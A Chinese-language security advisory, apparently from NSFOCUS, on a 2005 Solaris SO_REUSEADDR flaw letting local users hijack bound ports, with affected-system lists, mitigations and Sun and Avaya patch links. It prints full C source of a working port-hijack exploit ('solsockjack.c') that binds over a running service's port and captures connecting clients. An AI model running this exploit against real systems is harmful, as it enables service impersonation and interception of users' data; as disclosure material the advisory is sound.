安全研究
安全漏洞
Sun Solaris非特权网络端口劫持漏洞
发布日期:2005-07-07
更新日期:2005-07-07
受影响系统:
Sun Solaris 9.0_x86描述:
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
AVAYA CMS Server 9.0
AVAYA CMS Server 13.0
AVAYA CMS Server 12.0
AVAYA CMS Server 11.0
AVAYA Interactive Response 1.3
AVAYA Interactive Response 1.2.1
BUGTRAQ ID: 13241
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
Solaris在使用SO_REUSEADDR时存在漏洞,Kernel可能会支持任何套接字绑定操作,这样如果已经使用了特定的IP地址的话,恶意的套接字可能绑定到已经绑定的端口。
本地非特权用户可能利用这个漏洞在非特权端口上启动进程。通过劫持端口,这些进程可以用作在该端口上运行的修改过的或植入木马版本的服务,这可能导致服务破坏,泄漏敏感信息,或入侵远程系统。
<*来源:c0ntexb (c0ntexb@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112067885917420&w=2
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-57766-1
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* solsockjack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <arpa/inet.h>
#define BAD "!@#$%^&*()-_=+[]{};':\",/<>?\\|`~ \
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" #define DEFHOST \
"localhost" #define MAX_INCONN 1
#define PORT 1241 /* Nessus */
#define SYSTEM "SunOS"
#define BL "\x1B[1;34m"
#define NO "\x1B[0m"
#define PI "\x1B[35m"
#define PU "\x1B[1;35m"
#define RE "\x1B[1;31m"
#define WH "\x1B[1;37m"
#define YE "\x1B[1;33m"
void
banner(void)
{
fprintf(stderr, "\n%s[-] %sSUN Solaris SPARC / x86 Local Socket Hijack \
Exploit\n", YE, NO);
fprintf(stderr, "%s[-] %sKernel issue allows a bind on an already bound \
socket\n", YE, NO);
fprintf(stderr, "%s[-] %sallowing a malicious user to impersonate a service \
that\n", YE, NO);
fprintf(stderr, "%s[-] %sis already running on a port greater than 1024, \
making\n", YE, NO);
fprintf(stderr, "%s[-] %sservice-in-the-middle attacks a trivial task to \
perform.\n", YE, NO);
fprintf(stderr, "%s[-] %sDeveloped by c0ntex || c0ntexb@gmail.com%s\n\n", YE, \
WH, NO);
_exit(EXIT_SUCCESS);
}
void
usage(int argc, char **argv)
{
fprintf(stderr, "%s[-] %s Usage:\n", YE, NO);
fprintf(stderr, "%s[-] %s\t -h \t\tIP address to bind socket to\n", YE, NO);
fprintf(stderr, "%s[-] %s\t -p \t\tport number to attempt hijack of\n", YE, \
NO); fprintf(stderr, "%s[-] %s\t -v \t\tPrints this help\n", YE, NO);
fprintf(stderr, "%s[-] %s%s -h 10.1.1.215 -p 1241\n\n", YE, NO, argv[0]);
_exit(EXIT_FAILURE);
}
void
checkerr(char *isvuln)
{
free(isvuln);
puts("Not today!");
_exit(EXIT_FAILURE);
}
void
jackerr(char *vulnerable)
{
free(vulnerable);
_exit(EXIT_FAILURE);
}
char
*checksys(char *isvuln)
{
struct utsname name;
if(uname(&name) < 0) {
puts("uname failed");
}
isvuln = malloc(6);
if(!isvuln) {
perror("malloc");
_exit(EXIT_FAILURE);
}
if((name.sysname == NULL) || (strlen(name.sysname) < 1) || \
(strlen(name.sysname) > 5)) { checkerr(isvuln);
}
memcpy(isvuln, name.sysname, strlen(name.sysname));
if(!isvuln) {
checkerr(isvuln);
}
return(isvuln);
}
int
main(int argc, char **argv)
{
int inbuf, jacksock, opts, solvuln;
int port = PORT;
char *vulnerable = NULL;
char *systype = NULL;
char *isvuln = NULL;
char *bad = NULL;
struct sockaddr_in solaris, victims;
if(argc < 2) {
banner();
_exit(EXIT_FAILURE);
}
if((systype = checksys(isvuln)) == NULL) {
puts("Something messed up!");
checkerr(isvuln);
}
if(strcmp(SYSTEM, systype) != 0) {
puts("System is not supported - SunOS only!");
checkerr(isvuln);
}
fprintf(stderr, "\n%s-> %sOK, potential vulnerable %s[%s] %ssystem, \
continuing..\n", WH, NO, BL, systype, NO);
free(isvuln); sleep(2);
while((opts = getopt(argc, argv, "h:p:v")) != -1) {
switch(opts)
{
case 'h':
bad = BAD;
vulnerable = malloc(16);
if(!vulnerable) {
perror("malloc");
_exit(EXIT_FAILURE);
}
if((optarg == NULL) || (strlen(optarg) < 7) || \
(strlen(optarg) > 15) || strpbrk(bad, optarg)) {
puts("\n[-] Failed: IP address just isn't \
right!\n"); jackerr(vulnerable);
}
memcpy(vulnerable, optarg, strlen(optarg));
if(!vulnerable) {
jackerr(vulnerable);
}
break;
case 'p':
port = atoi(optarg);
if((port < 1024) || (port > 65535)) {
puts("\n[-] Failed: Port number just isn't \
right!\n"); usage(argc, argv);
_exit(EXIT_FAILURE);
}
break;
case 'v':
usage(argc, argv);
break;
default:
usage(argc, argv);
break;
}
}
if(vulnerable == NULL) {
jackerr(vulnerable);
}
fprintf(stderr, "%s-> %sJacking port %s[%d] %sat address %s[%s]%s\n", WH, NO, \
PI, port, NO, PU, vulnerable, NO);
jacksock = socket(AF_INET, SOCK_STREAM, 0);
if(jacksock < 0) {
perror("socket");
jackerr(vulnerable);
} sleep(2);
if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) \
{ perror("setsockopt");
}
solaris.sin_family = AF_INET;
solaris.sin_port = htons(port);
solaris.sin_addr.s_addr = inet_addr(vulnerable);
memset(&solaris.sin_zero, '\0', sizeof(solaris.sin_zero));
if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(struct sockaddr)) < 0) \
{ perror("bind");
fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be \
patched!\n", RE, NO); jackerr(vulnerable);
}
fprintf(stderr, "%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-> \
%sWait...\n", WH, NO, YE, NO, PI, port, NO, WH, NO);
if(listen(jacksock, MAX_INCONN) < 0) {
perror("listen");
puts("[-] Failed: Could not listen for an incoming connection!");
jackerr(vulnerable);
} sleep(2);
fprintf(stderr, "%s-> %sOK, listening for incoming connections to \
compromise", WH, NO);
inbuf = sizeof(victims);
if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) {
perror("accept");
puts("[-] Failed: Could not accept the incoming connection!");
jackerr(vulnerable);
}
fprintf(stderr, "\n%s-> %sSnagged a victim connecting from %s[%s]%s\n", WH, \
NO, YE, inet_ntoa(victims.sin_addr), NO);
sleep(1);
close(jacksock);
puts("-> Victim has been released to live another day!");
sleep(1);
puts("-> Test was a success!");
free(vulnerable);
return(0);
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 将有漏洞的端口号设置为特权端口。可以使用以下kernel参数将1024以上端口设置为保留端口,这样仅可对其绑定root:
tcp_extra_priv_ports_add
如果要浏览特权端口,请运行以下命令:
ndd /dev/tcp tcp_extra_priv_ports
如果要将端口设置为特权端口,请运行以下命令:
ndd -set /dev/tcp tcp_extra_priv_ports_add 8080
厂商补丁:
Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-57766)以及相应补丁:
Sun-Alert-57766:Certain Network Services Disruptions or "Spoofs" Could Occur as a Result of Possible Network Port Theft
链接:http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-57766-1
补丁下载:
Sun Solaris 8.0 _x86
* Sun Patch 116966-08
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116966-08-1
Sun Solaris 8.0
* Sun Patch 116965-08
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116965-08-1
Sun Solaris 9.0
* Sun Patch 118305-02
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-118305-02-1
Sun Solaris 9.0 _x86
* Sun Patch 117470-01
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-117470-01-1
AVAYA
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://support.avaya.com/elmodocs2/security/ASA-2005-113_SUN-4-21-2005.pdf
浏览次数:3339
严重程度:0(网友投票)
绿盟科技给您安全的保障